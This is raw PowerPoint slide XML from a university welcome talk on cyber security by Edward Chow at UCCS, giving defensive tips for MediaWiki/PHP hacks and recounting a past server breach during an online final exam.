      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1039" name="Rectangle 15"/>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400" b="1" i="1">
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{51289606-D701-416F-AE77-1BE5BE8E1514}"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6" r:id="rId14"/>
  </p:sldLayoutIdLst>
  <p:transition>
    <p:fade/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:hf hdr="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Segoe Semibold" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Segoe Semibold" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Segoe Semibold" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Segoe Semibold" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Segoe Semibold" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Segoe Semibold" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Segoe Semibold" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Segoe Semibold" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="461963" indent="-461963" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId20"/>
        </a:buBlip>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="850900" indent="-387350" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId21"/>
        </a:buBlip>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1257300" indent="-404813" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId21"/>
        </a:buBlip>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1655763" indent="-396875" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId21"/>
        </a:buBlip>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2052638" indent="-395288" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId21"/>
        </a:buBlip>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2509838" indent="-395288" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId21"/>
        </a:buBlip>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2967038" indent="-395288" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId21"/>
        </a:buBlip>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3424238" indent="-395288" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId21"/>
        </a:buBlip>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3881438" indent="-395288" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId21"/>
        </a:buBlip>
        <a:defRPr>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eg"/><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9.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.gif"/><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boxgrinder.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viva.uccs.edu/ictf/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.pn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hyperlink" Target="http://www.cs.ucsb.edu/~vign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cyue@uccs.edu"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viva.uccs.edu/ictf/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><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png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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7.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId9"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.jpeg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/U.S._News_&amp;_World_Report" TargetMode="External"/><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4.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId16"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53.jpe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jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.jpeg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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75" y="1"/>
            <a:ext cx="91440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130223" cy="119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WORK\EAS\program\colleg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7452" y="1"/>
            <a:ext cx="1452423" cy="13898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WORK\EAS\program\sen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42200" y="1423460"/>
            <a:ext cx="1717675" cy="11451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noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234564053"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="90890" y="1134707"/>
          <a:ext cx="1474221" cy="1431130"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s2073" name="Photo Editor Photo" r:id="rId7" imgW="1647619" imgH="1600000" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Photo Editor Photo" r:id="rId7" imgW="1647619" imgH="1600000" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Object 7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890" y="1134707"/>
                        <a:ext cx="1474221" cy="1431130"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:effectLst/>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="355600" y="3295650"/>
            <a:ext cx="8343900" cy="2557623"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Cyber Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Engineering and Applied Science</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>University of Colorado at Colorado Springs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408820972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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mediawiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or PHP Hacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1103313"/>
            <a:ext cx="8410575" cy="4745915"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set a policy to forbid the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mediawiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>! </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Just kidding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Be diligent in patching/porting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mediawiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.  Let me know if you know a fast method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Put them behind campus firewall.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make sure to limit file types for upload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ighten accesses by only allowing email confirmed users to have accesses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User other tools: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sharepoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> doc,… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89568682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0025"/>
            <a:ext cx="8382000" cy="2086725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSL Security Breach while online final </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431800" y="1738313"/>
            <a:ext cx="8410575" cy="4487382"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To save a few trees, 2006 final was in the computer lab with access to all course material.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A few minutes into the exam, Jim rushed in and said “Dr. Chow, the server log shows the login and password of all student accounts.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jim observed brute force tries on root password for cs.uccs.edu quite sometime.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Look like the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>openssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> library was replaced.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What would you do in this case? Stop final, let go home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCFF99"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
